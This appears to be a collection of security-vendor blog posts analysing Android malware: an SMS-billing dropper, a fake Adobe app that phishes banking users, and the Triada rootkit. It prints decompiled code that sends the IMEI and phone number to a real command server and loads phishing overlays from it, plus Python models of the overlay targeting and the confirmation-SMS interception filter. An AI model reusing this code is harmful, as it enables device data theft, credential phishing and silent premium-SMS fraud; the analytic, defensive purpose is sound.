Analysis of com.zqb.skater and Dropper/SMS behaviors


— Trustlook Research Team

Package name: com.zqb.skater

md5: fbf041055829b571816af52761fcf23c

Chinese name: 我的滑板鞋 ("My Skateboard Shoes")


After installation the app looks like an ordinary game in which users can buy virtual items. In the background, however, it collects the IMEI, the device ID and the user's SMS messages.

[Screenshot: the game as presented to the user]

It is common for games to bill in-app purchases by sending a premium SMS to a specific company: the user buys virtual items that make the game easier. This app, however, drops a second app that sends the premium SMS without any user interaction. The aggregator and the wireless carrier then send the user a message asking them to confirm the order. The dropped app intercepts that message, hides it from the user and replies to confirm the charge. The user is billed silently and the malware developer collects the money.

Details:

  1. The app declares the SMS read, receive and send permissions in AndroidManifest.xml.

  [Screenshot: SMS permissions declared in AndroidManifest.xml]

It also registers a broadcast receiver for the incoming-SMS broadcast and several other intents with the highest priority, so that it is handed the message before the stock messaging app.

[Screenshot: high-priority receiver registrations in AndroidManifest.xml]

For example, the SSLaunchReceiver below shows that the app holds many privileges, including receiving SMS.

[Screenshot: SSLaunchReceiver]

  2. The app then downloads a second APK that sends SMS and, by aborting the ordered broadcast, stops an incoming message from propagating to the other receivers. This lets the app receive and intercept the reply SMS.

[Screenshot: downloading the plugin APK]


The APK is saved to "/storage/emulated/0/Android/data/com.lyhtgh.pay/plugins/" under the name com.lyhtgh.pay.ltplugin.apk. Note that this is external (shared) storage, so the plugin is loaded from a location that any app with the storage permission can read and overwrite.

The figures below show the logic to send and block SMS.

Send SMS:

[Screenshot: SMS sending logic]

Receive and block SMS:

[Screenshot: SMS receiving and blocking logic]

  3. As shown in the last figure, the plugin receives a broadcast named "receive_revert_sms_action_internal" and then sends a message to the host app. When this broadcast is received, it processes the intercepted SMS, whose content is stored in a temporary file on the device.

[Screenshot: handling of receive_revert_sms_action_internal]
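As an added example (not part of the original analysis and not the sample's code), the following Python script performs the static check an analyst would run over a decoded AndroidManifest.xml to flag the pattern from steps 1 and 2: SMS permissions combined with a receiver for the incoming-SMS broadcast registered at a very high priority. The manifest embedded in it is constructed for the demonstration, its receiver and package names are placeholders, and the priority threshold is an assumed triage cut-off.

```python
"""Static triage of a decoded AndroidManifest.xml for the SMS-interception pattern
described above: SMS permissions plus a high-priority receiver for incoming SMS."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
SMS_PERMISSIONS = {
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
}
SMS_ACTIONS = {
    "android.provider.Telephony.SMS_RECEIVED",
    "android.provider.Telephony.WAP_PUSH_RECEIVED",
}
# SMS_RECEIVED is an ordered broadcast; a receiver with a priority this high runs
# before the messaging app and can call abortBroadcast() to hide the message
# (effective up to Android 4.3; from 4.4 the broadcast can no longer be aborted).
# The threshold is an assumed triage cut-off, not a value from the sample.
PRIORITY_THRESHOLD = 1000

# Constructed manifest in the shape described above. Receiver and package names
# are placeholders, not the ones in the analysed sample.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.skatergame">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application android:label="game">
    <receiver android:name=".HighPrioSmsReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".InstallReceiver">
      <intent-filter>
        <action android:name="android.intent.action.PACKAGE_ADDED"/>
        <data android:scheme="package"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def _priority(intent_filter):
    """android:priority as an int; unresolvable values (resource references) count as 0."""
    try:
        return int(intent_filter.get(ANDROID_NS + "priority", "0"), 0)
    except ValueError:
        return 0


def triage_manifest(xml_text):
    """Return the SMS permissions, the high-priority SMS receivers and a verdict."""
    root = ET.fromstring(xml_text)
    granted = {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}
    hits = []
    for receiver in root.iter("receiver"):
        for flt in receiver.findall("intent-filter"):
            actions = {a.get(ANDROID_NS + "name") for a in flt.findall("action")}
            prio = _priority(flt)
            if actions & SMS_ACTIONS and prio >= PRIORITY_THRESHOLD:
                hits.append({
                    "receiver": receiver.get(ANDROID_NS + "name"),
                    "priority": prio,
                    "actions": sorted(actions & SMS_ACTIONS),
                })
    sms_perms = sorted(granted & SMS_PERMISSIONS)
    return {
        "sms_permissions": sms_perms,
        "high_priority_sms_receivers": hits,
        # The combination, not either indicator alone, is what matches this family
        "suspicious": bool(sms_perms) and bool(hits),
    }


if __name__ == "__main__":
    for key, value in triage_manifest(SAMPLE_MANIFEST).items():
        print(key, "=", value)
```

Run it directly, or call triage_manifest() on the manifest produced by apktool or another AXML decoder. Only the combination of indicators is flagged: many legitimate messaging apps request SMS permissions, and a high priority on its own is not malicious.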


Fake Adobe Flash App Evades Most Anti Virus Detection, Manipulates Phone by Command & Control Server in Latvia

— Trustlook Research Team

Smartphones have reached every corner of the world. After years of rapid growth, their popularity and usefulness rival those of personal computers, and besides calling and texting, more and more people do their daily banking on them. With that computing capability, traditional malware is moving to smartphones as well: it compromises the phone, changes its behaviour and takes instructions from a remote attacker to steal the user's information.

One such example is a newly discovered malicious app named "Adobe Update", with the package name "droid.invisible". It is a phishing Trojan that targets the Android platform.

The sample's MD5 is: D8616CDD54154B06A5E4D9D5B2A605E5
The package icon is:

[Image: package icon]

On VirusTotal, only 3 of 57 antivirus engines detected the sample when it was first submitted.

[Screenshot: VirusTotal detection results]

The malware dresses up its own developer certificate to look like it belongs to a reputable enterprise:

[Screenshot: subject of the malware's signing certificate]

whereas the official com.adobe.reader app on Google Play is signed with Adobe's genuine developer certificate:

[Screenshot: subject of the genuine Adobe signing certificate]

Since anyone can put any name into a self-signed certificate, the subject fields prove nothing; only the certificate fingerprint (or the public key) identifies the real publisher.

Upon installation, the malware presents the user with a misleading setup dialog while making itself the default SMS app (on Android 4.4 and later this is what gives an app full access to incoming messages):

[Screenshot: setup dialog and default SMS app prompt]

It then displays messages to entice the user to grant it device administrator rights, which it uses to stay persistent on the system:

[Screenshot: device administrator prompt]

With the device administrator active, the app cannot be uninstalled by normal means:

[Screenshot: uninstall blocked]

The app communicates with a remote server and sends out critical personal information:

  • Country
  • Device model
  • IMEI
  • Network operator
  • Cell phone number
  • Malware bot ID
  • OS version
  • Device name
  • OS API level

[Screenshot: captured check-in traffic to the C&C server]

The following code snippets demonstrate the above behaviours:


class […] implements Runnable
[…]
    // Wait 20 seconds after the service starts, then exfiltrate device data
    Thread.sleep(20000L);
    Log.d("INVISIBLE-LOG", "[GATE SERVICE] - SEND MOBILE DATA");
    a.a.a.a.a locala = new a.a.a.a.a();   // obfuscated HTTP client
    x localx = new x();                   // obfuscated request-parameter map
    TelephonyManager localTelephonyManager = (TelephonyManager)this.a.getSystemService("phone");
    localx.a("id", localTelephonyManager.getDeviceId());                  // IMEI
    localx.a("country", localTelephonyManager.getNetworkCountryIso());
    localx.a("opname", localTelephonyManager.getNetworkOperatorName());   // carrier
    localx.a("osversion", System.getProperty("os.version") + "(" + Build.VERSION.INCREMENTAL + ")");
    localx.a("osapilevel", Build.VERSION.RELEASE + "(" + Build.VERSION.SDK_INT + ")");
    localx.a("device", Build.DEVICE);
    localx.a("model", Build.MODEL + " (" + Build.PRODUCT + ")");
    localx.a("pnumber", localTelephonyManager.getLine1Number());          // phone number
    localx.a("botid", "777");                                             // hard-coded bot ID
    // POST everything to the C&C gate; b is the response callback that handles commands
    locala.a("http://94.140.120.183/gate/receive.php", localx, new b(this));
[…]

Furthermore, the malware receives command instructions from the C&C server to perform various functions:

  • loop  // wait for the next command
  • sms  // send an SMS message
  • readsms  // read SMS messages and send them to the C&C server
  • ion  // not implemented; only writes to the log
  • ioff  // same as above
  • recall  // call the received numbers
  • fish  // show an attacker-controlled web page when a specific app is found running in the foreground

The following code snippets demonstrate the malware checks for the received parameters and shows a phishing web page:

// Command dispatcher: the first token of the C&C reply selects the action
if (paramArrayOfByte[0].equals("fish")) // compare command name
{
    Log.d("INVISIBLE-LOG", "[GATE SERVICE] :: FISH");
    // Hand the injection configuration (second token) to the scanner service
    this.b.a.startService(new Intent(this.b.a, InjectionScanner.class).putExtra("data", paramArrayOfByte[1]));
}
[…]
public class InjectionScanner extends Service
{
    int a = 0;   // set to 1 once an overlay has been launched
    String b;    // injection configuration received from the C&C

    public String a()
    {
        // The first entry of getRunningAppProcesses() is treated as the foreground app
        return ((ActivityManager.RunningAppProcessInfo)((ActivityManager)getSystemService("activity")).getRunningAppProcesses().get(0)).processName; // get foreground running process name
    }

    public void a(String paramString)
    {
        // Start the foreground-app polling loop (g) on a daemon thread
        Thread localThread = new Thread(new g(this, paramString));
        localThread.setDaemon(true);
        localThread.start();
    }
[…]
    public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)
    {
        this.b = paramIntent.getStringExtra("data");
        a();
        a(this.b);
        return paramInt1;
    }
[…]
}
// Inside g: the configuration is a JSON object keyed by target name, each entry holding an "apps" array
if (this.b.a().equals(localJSONObject.getJSONObject(localJSONObject.names().getString(i)).getJSONArray("apps").getString(j))) // compare the foreground running app name with the received string
{
    Intent localIntent = new Intent(this.b, InjectionActivity.class);
    localIntent.addFlags(268435456); // FLAG_ACTIVITY_NEW_TASK: needed to start an Activity from a Service
    localIntent.putExtra("injection", localJSONObject.names().getString(i)); // target name, becomes the bank= parameter
    this.b.startActivity(localIntent);
    this.b.a = 1; // overlay fired; the loop does not trigger again
[…]
// InjectionActivity: a full-screen WebView that loads the attacker's page for the matched target
@SuppressLint({"SetJavaScriptEnabled"})
protected void onCreate(Bundle paramBundle)
{
    super.onCreate(paramBundle);
    setContentView(2130968604);
    TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");
    Intent localIntent = getIntent();
    WebView localWebView = (WebView)findViewById(2131492971);
    localWebView.getSettings().setJavaScriptEnabled(true);
    localWebView.setWebViewClient(new f(this, null));
    localWebView.setWebChromeClient(new e(this, null));
    // The phishing URL carries the target name and the victim's IMEI
    localWebView.loadUrl("http://94.140.120.183/injections/?bank=" + localIntent.getStringExtra("injection") + "&imei=" + localTelephonyManager.getDeviceId()); // show phishing web page
}
}

The malware displays a phishing web page when a specific app, for example a banking app, is found in the foreground. The page imitates that app and persuades unsuspecting users to enter their financial details, which the fraudsters harvest.
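The matching logic in InjectionScanner and the URL built by InjectionActivity can be modelled in a few lines. The Python below is an added example, not code from the sample or from Trustlook; it assumes the injection configuration has the shape the decompiled code iterates over (a JSON object keyed by target name, each holding an "apps" array), and the target names, package names and IMEI in it are constructed placeholders.

```python
"""Model of the 'fish' command handling: match the foreground process against the
C&C's injection configuration and build the overlay URL the WebView would load."""
import json
from urllib.parse import urlencode

C2_BASE = "http://94.140.120.183"  # C&C host observed in the sample

# Constructed configuration in the shape the decompiled code iterates over:
# top-level keys are target names (later sent as the bank= parameter), each
# holding an "apps" array of process names. The names below are placeholders,
# not targets recovered from the sample.
SAMPLE_INJECTION_CONFIG = json.dumps({
    "examplebank": {"apps": ["com.example.bank.mobile", "com.example.bank.lite"]},
    "examplepay": {"apps": ["com.example.pay"]},
})


def match_injection(config_json, foreground_process):
    """Return the target name whose apps list contains foreground_process, else None.

    Mirrors the nested loop over names().getString(i) / getJSONArray("apps").getString(j).
    """
    config = json.loads(config_json)
    for target, entry in config.items():
        for app in entry.get("apps", []):
            if foreground_process == app:
                return target
    return None


def injection_url(target, imei):
    """URL that InjectionActivity loads for a matched target. The query is built with
    urlencode here; the sample concatenates the raw strings."""
    return C2_BASE + "/injections/?" + urlencode({"bank": target, "imei": imei})


def scan(config_json, foreground_sequence, imei):
    """Simulate the polling thread: the overlay fires once, for the first foreground
    process that matches, after which the scanner sets its flag (a = 1) and stops."""
    for process in foreground_sequence:
        target = match_injection(config_json, process)
        if target is not None:
            return {"target": target, "triggered_by": process, "url": injection_url(target, imei)}
    return None


if __name__ == "__main__":
    # Constructed foreground history; the IMEI is a dummy value
    history = ["com.android.launcher", "com.example.pay", "com.example.bank.mobile"]
    print(scan(SAMPLE_INJECTION_CONFIG, history, "000000000000000"))
```

scan() returns after the first match, mirroring the a = 1 flag that stops the overlay from firing again. The foreground check the sample relies on, getRunningAppProcesses().get(0), is fragile: the first entry is not guaranteed to be the foreground app, and on newer Android releases third-party apps only see their own process in that list.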

The C&C server 94.140.120.183 is located in Latvia:

http://whois.domaintools.com/94.140.120.183


[Screenshot: whois result for 94.140.120.183]

Spearphishing is on the Million Dollar Horizon

Attackers are getting more creative around the world. It takes only a split second for one to compromise a server, a computer or a person's personal information. The growing trend is that attackers bypass the traditional technical pathways of phishing and go straight for employees who have not been trained to recognise manipulation. Recently in the United States, an investment firm located in Michigan fell victim to spearphishing. The firm reported that one of its employees had accidentally transferred approximately $500,000 to a bank in Hong Kong. The employee had received an email from someone posing as a company executive asking for the transfer; the email looked legitimate, so the staffer carried out the request and wired the money to the overseas account.

This is neither the first nor the last time a company will suffer such a breach. With tax season in the United States having just ended, many attackers are seizing the opportunity. Tax forms hold sensitive information, W-2 forms especially: addresses, incomes, places of employment, social security numbers and family details. Criminals use this data to file fraudulent tax returns for their own benefit and keep the rest for later use.

Other scams resemble those faced by larger companies, where the criminal simply targets employees and staffers. Posing as a company executive or the person's manager, attackers talk employees into transferring millions of dollars. Studies cited at the time report a 67% increase in such attacks worldwide and a 43% increase in fraudulent tax schemes.

Cybercriminals use increasingly sophisticated methods to work out which attacks would pay off most for them and do the most damage to corporations and ordinary citizens. With the help of automated tooling, an attacker can find the weak points to exploit and turn that information into profit. Whether the prize is a few bitcoins or millions of dollars, cybercriminals will do whatever it takes to gain the edge.

Trustlook’s New App Addresses Widespread Qualcomm Vulnerability

Trustlook is taking steps to combat a widespread vulnerability affecting millions of Android devices. First reported by FireEye in March 2016, the vulnerability is present in Android Jelly Bean, KitKat and Lollipop phones using Qualcomm CPUs. On these devices, a third-party app could gain elevated system privileges, or access to the user's SMS database and call history, without the user's knowledge.

To let users determine whether their device is affected, Trustlook released a free Qualcomm Vulnerability Scanner application so that any Android phone owner can check for the flaw. If the device is exposed, the user may be able to obtain a software update from the device manufacturer that contains the security patch.

A major concern is that for many devices no fix will ever be available, because the manufacturer no longer supplies regular updates and security patches. The only way to eliminate the vulnerability itself is to move to a device that receives the patch; a mobile security app can detect or block attempts to exploit it, but does not remove the underlying flaw.

Trustlook is working on additional protection against exploitation of the Qualcomm vulnerability in its core Trustlook Mobile Security application, particularly for devices that currently lack a patch for the system software. Please stay tuned for updates. In the meantime, you are strongly encouraged to download the Qualcomm Vulnerability Scanner to determine whether your device is at risk.

Organized Crime using Rootkit – The analysis of the Triada malware

– Trustlook Research Team

The Trustlook Research Team recently analysed a sophisticated piece of malware that uses a rooting SDK to enable its malicious behaviour.

MD5: 3B71DEBDE5F6A3E4D2E9321266DA76F7

Package name: fbkgofn.jpcebbe.mcdfpda.decjehi.kmnkgeg.kdgkohl

  1. The sample uses a popular rooting SDK (Root Genius, com.shuame.rootgenius.sdk) to root the phone and obtain root privileges. It first checks whether the phone is already rooted. If not, it collects device information (Android version, SDK version, product ID and so on) and uploads it to the server, which selects a matching root exploit. The exploit is then downloaded, uncompressed and decrypted before it is run.

  Fig.1. Check whether the phone has been rooted

  Fig.2. Collect the phone's info for downloading a suitable root exploit from the server

  2. The sample uses the "com.android.essdk.eyou.b.b" SDK to charge the user's phone bill by sending SMS to premium-rate numbers. It also monitors the SMS inbox and intercepts the reply SMS from those numbers that notify the user a service has just been ordered. The interception filter keywords are: 10086 (China Mobile's customer-service number), 成功订购 ("successfully subscribed"), 和视频 and 和视界 (names of carrier video services), and 1065/1066 (prefixes of premium service-provider short codes).

  Fig.3. Intercept the confirmation SMS sent from the premium-rate numbers

  Fig.4. Intercept the confirmation SMS containing the special keywords

  3. The sample uses tricks to evade static detection, such as assembling sensitive strings from individual characters at runtime. It builds "SMS_RECEIVED" and "WAP_PUSH_RECEIVED" this way so that an anti-virus signature for the literal action names does not match.

  Fig.5. Assembling a sensitive string by joining its characters dynamically

  4. The sample applies a filter that suppresses SMS containing certain keywords. The keywords are stored in a local SQLite database at /data/data/fbkgofn.jpcebbe.mcdfpda.decjehi.kmnkgeg.kdgkohl/databases/zhifu; the database is named zhifu and the table is named block.

  Fig.6. The database storing the SMS filter keywords and the ad display setting

The database's structure is as follows:

Fig.7. The table information of the SMS filter

Fig.8. All the keys of the SMS filter table
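To make the interception rule concrete, the Python below is an added example (not the sample's code and not from Trustlook) that keeps the filter keys in a SQLite table standing in for the block table of the zhifu database, and applies them to constructed incoming messages. The column layout, the split into sender prefixes and body keywords, and the messages are assumptions for the demonstration; only the keyword values come from the analysis above.

```python
"""Model of the sample's SMS-interception filter: sender prefixes and body keywords
stored in a SQLite table, applied to incoming messages to decide which are suppressed."""
import sqlite3

# Constructed table layout. The sample keeps its filter keys in the 'block' table of
# its 'zhifu' database; the real column names are not reproduced here.
SCHEMA = "CREATE TABLE block (kind TEXT NOT NULL, value TEXT NOT NULL)"

# Filter entries taken from the keyword list in the analysis above
FILTER_ROWS = [
    ("sender_prefix", "10086"),   # China Mobile customer-service number
    ("sender_prefix", "1065"),    # premium service-provider short-code prefixes
    ("sender_prefix", "1066"),
    ("keyword", "成功订购"),        # "successfully subscribed"
    ("keyword", "和视频"),          # carrier video service names
    ("keyword", "和视界"),
]


def load_filter_db():
    """In-memory stand-in for /data/data/<pkg>/databases/zhifu."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO block (kind, value) VALUES (?, ?)", FILTER_ROWS)
    conn.commit()
    return conn


def should_block(conn, sender, body):
    """True when the message matches a sender prefix or a body keyword, i.e. when the
    receiver would abort the broadcast so the confirmation never reaches the inbox."""
    prefixes = [row[0] for row in conn.execute(
        "SELECT value FROM block WHERE kind = 'sender_prefix'")]
    keywords = [row[0] for row in conn.execute(
        "SELECT value FROM block WHERE kind = 'keyword'")]
    if any(sender.startswith(p) for p in prefixes):
        return True
    return any(k in body for k in keywords)


def filter_inbox(conn, messages):
    """Split (sender, body) pairs into the ones the user sees and the ones suppressed."""
    delivered, suppressed = [], []
    for sender, body in messages:
        bucket = suppressed if should_block(conn, sender, body) else delivered
        bucket.append((sender, body))
    return delivered, suppressed


# Constructed messages, not captured from the sample
SAMPLE_MESSAGES = [
    ("10086", "您已成功订购和视频业务，资费10元/月"),  # carrier confirmation of the premium order
    ("10658888", "订购确认：回复Y确认"),             # SP short code, reply-to-confirm prompt
    ("13800138000", "晚上一起吃饭？"),              # ordinary message from a contact
    ("10010", "您的话费余额为50元"),                 # another carrier's number, not in the filter
]

if __name__ == "__main__":
    delivered, suppressed = filter_inbox(load_filter_db(), SAMPLE_MESSAGES)
    print("delivered:", [s for s, _ in delivered])
    print("suppressed:", [s for s, _ in suppressed])
```

Note the asymmetry the filter creates: the message the premium service sends to confirm the order is exactly the one the user never sees, while unrelated messages pass through, so the charge appears on the bill with no trace in the inbox.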